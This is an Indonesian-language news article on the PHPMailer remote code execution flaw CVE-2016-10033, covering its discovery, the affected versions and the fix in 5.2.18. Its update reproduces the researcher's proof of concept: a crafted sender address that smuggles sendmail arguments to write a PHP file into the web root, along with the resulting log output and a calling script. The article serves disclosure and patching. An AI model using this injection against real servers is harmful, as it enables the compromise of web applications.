Kecatatan Kritis PHPMailer Membuat Jutaan Website Memiliki Kerentanan Remote Exploit

Sebuah kerentanan kritis kali ini ditemukan di PHPMailer. Yang mana PHPMailer ini merupakan salah satu library open source PHP populer untuk mengirim email. Dan saat ini sudah tercatat sudah digunakan oleh lebih dari 9 juta user di seluruh dunia. Kerentanan PHPMailer yang kali ini ditemukan membuat jutaan website jadi memiliki kerentanan.

Jutaan website tersebut termasuk aplikasi web open source populer. Diantaranya WordPress, Drupal, 1CRM, SugarCRM, Yii, dan Joomla yang dilengkapi dengan library PHPMailer. Yang mana biasanya library ini bertujuan untuk mengirim email menggunakan berbagai metode. Termasuk SMTP untuk para usernya.

Kerentanan ini ditemukan oleh peniliti keamanan Polandia, Dawid Golunski dari Legal Hacker. Kerentanan kritis (CVE-2016-10033) ini memungkinkan penyerang meremote eksekusi kode arbitrary dalam konteks web server. Serta mengganggu aplikasi web target.

“Untuk mengeksploitasi kerentanan, penyerang bisa menargetkan komponen website umum. Seperti formulir kontak/umpan balik, formulir pendaftaran, reset password email dan lain-lain. Yang mengirimkan email dengan bantuan versi yang rentan dari PHPMailer class,” Tulis Golunski dalam konsultasinya.

Golunski sudah melaporkan kerentanan ini kepada para pengembangnya. Dan kerentanan ini pun sudah diperbaiki dalam rilisan baru mereka, PHPMailer 5.2.18.

Semua versi dari PHPMailer dibawah versi PHPMailer 5.2.18 terpengaruh oleh kerentanan ini. Jadi para administrator web dan pengembang web yang menggunakan PHPMailer, sangat dianjurkan untuk mengupdate ke versi yang sudah memperbaiki kerentanan ini.

Masih Banyak Website Yang Memiliki Kerentanan Baru Ini

Saat artikel ini kami publish, masih banyak website yang belum mengupdate PHPMailer mereka. Dan masih tercatat jutaan website yang menggunakan PHPMailer masih memiliki kerentanan baru ini.

Namun, Golunski telah berjanji untuk merilis rincian lebih mengenai teknis tentang kerentanan ini dalam beberapa hari mendatang. Termasuk proof-of-concept exploit code dan video demonstrasinya.

Ketika para peniliti mempublikasikan hal tersebut, kami akan memperbarui artikel ini dengan informasi tambahan tentang kerentanan PHPMailer ini. Tentu juga, dengan exploit code dan video demonstrasinya.

Update: Exploit Code Untuk PHPMailer RCE Sudah Dipublikasikan

• PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
• Discovered/Coded by: Dawid Golunski (@dawid_golunski) – https://legalhackers.com

Sebuah PoC sederhana (bekerja pada Sendmail MTA) ini akan menginjeksi parameter berikutuntuk perintah sendmail:

1 2 3 4 5 6 7

Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-fattacker\] Arg no. 4 == [-oQ/tmp/] Arg no. 5 == [-X/var/www/cache/phpcode.php] Arg no. 6 == [some"@email.com]

Yang mana akan menulis transfer log (-X) ke dalam file /var/www/cache/phpcode.php. File yang dihasilkan akan berisi muatan yang sah dalam isi pesan:

1 2 3 4 5 6 7 8

09607 <<< --b1_cb4566aa51be9f090d9419163e492306 09607 <<< Content-Type: text/html; charset=us-ascii 09607 <<< 09607 <<< <?php phpinfo(); ?> 09607 <<< 09607 <<< 09607 <<< 09607 <<< --b1_cb4566aa51be9f090d9419163e492306--

Inputan penyerang berasal dari sumber yang tidak dipercaya seperti $ _GET, $ _POST d.l.l. Misalnya dari form kontak.

1 2	$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com'; $msg_body  = "<?php phpinfo(); ?>";

mail() param injection via kerentanan dalam PHPMailer.

PHP

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

require_once('class.phpmailer.php'); $mail = new PHPMailer(); // defaults to using php "mail()"   $mail->SetFrom($email_from, 'Client Name');   $address = "customer_feedback@company-X.com"; $mail->AddAddress($address, "Some User");   $mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033"; $mail->MsgHTML($msg_body);   if(!$mail->Send()) {   echo "Mailer Error: " . $mail->ErrorInfo; } else {   echo "Message sent!\n"; }

“Jika pengeksploitasian sukses, maka hal tersebut bisa membiarkan penyerang dari jarak jauh mendapatkan akses ke server target. Sebuah akses dalam konteks account web server yang dapat memberikan suatu kompromi penuh atas aplikasi web,” kata Golunski.